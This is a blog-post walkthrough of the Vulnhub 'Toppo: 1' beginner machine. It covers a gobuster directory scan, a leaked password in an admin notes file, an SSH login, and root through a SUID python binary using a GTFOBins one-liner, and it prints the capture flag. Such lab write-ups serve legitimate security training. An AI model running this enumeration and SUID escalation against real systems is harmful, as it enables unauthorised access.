---
layout: post
title:  "Vulnhub - Toppo: 1"
date:   2020-10-19 20:00:00 +1100
category: hacking
---

## Introduction
*The Machine isn't hard to own and don't require advanced exploitation .  
Level : Beginner  
DHCP : activated  
Inside the zip you will find a vmdk file , and I think you will be able to use it with any usual virtualization software ( tested with Virtualbox)*

This box is on the [NetSecFocus Admin list](https://docs.google.com/spreadsheets/d/1dwSMIAPIam0PuRBkCiDI88pU3yzrqqHkDtBngUHNCw8/edit#gid=0) of OSCP-like machines. It's [TOPPO: 1](https://www.vulnhub.com/entry/toppo-1,245/) from vulnhub. It is just a vmdk file which I ran in Virtualbox: I made a new Linux VM and then opened the disk file. It worked ok.

## Ports
This box has:
1. SSH on 22, 
2. HTTP on port 80, 
3. rpcbind on 111 and (probably) 54036 - I didn't check, but that port was open.

## HTTP
Gobuster gives some results:

{% highlight shell %}
root@kali:/opt/vulnhub/toppo# gobuster dir -u http://192.168.1.112 -w /usr/share/seclists/Discovery/Web-Content/common.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.1.112
[+] Threads:        10
[+] Wordlist:       /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/10/19 02:55:47 Starting gobuster
===============================================================
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/LICENSE (Status: 200)
/admin (Status: 301)
/.hta (Status: 403)
/css (Status: 301)
/img (Status: 301)
/index.html (Status: 200)
/js (Status: 301)
/mail (Status: 301)
/manual (Status: 301)
/server-status (Status: 403)
/vendor (Status: 301)
===============================================================
2020/10/19 02:55:49 Finished
===============================================================
{% endhighlight %}

In the */admin* directory we find *notes.txt*, which says:
>Note to myself :
I need to change my password :/ 12345ted123 is too outdated but the technology isn't my thing i prefer go fishing or watching soccer .

From this we can guess that the username is **ted**, and we have the password above. We can SSH in.

## On the box
Linpeas says that **python2.7** has the SUID bit set. Checking */usr/bin* we can see python2.7 is symlinked to *python*. [GTFOBins](https://gtfobins.github.io/gtfobins/python/#suid) provides a suggestion, which works with a slight modification:

{% highlight shell %}
ted@Toppo:/dev/shm$ python -c 'import os; os.execl("/bin/bash", "sh", "-p")'
sh-4.3# whoami
root
sh-4.3# cd /root
sh-4.3# ls
flag.txt
sh-4.3# cat flag.txt

ASCII art removed

Congratulations ! there is your flag : 0wnedlab{p4ssi0n_c0me_with_pract1ce}

{% endhighlight %}

And that was that.
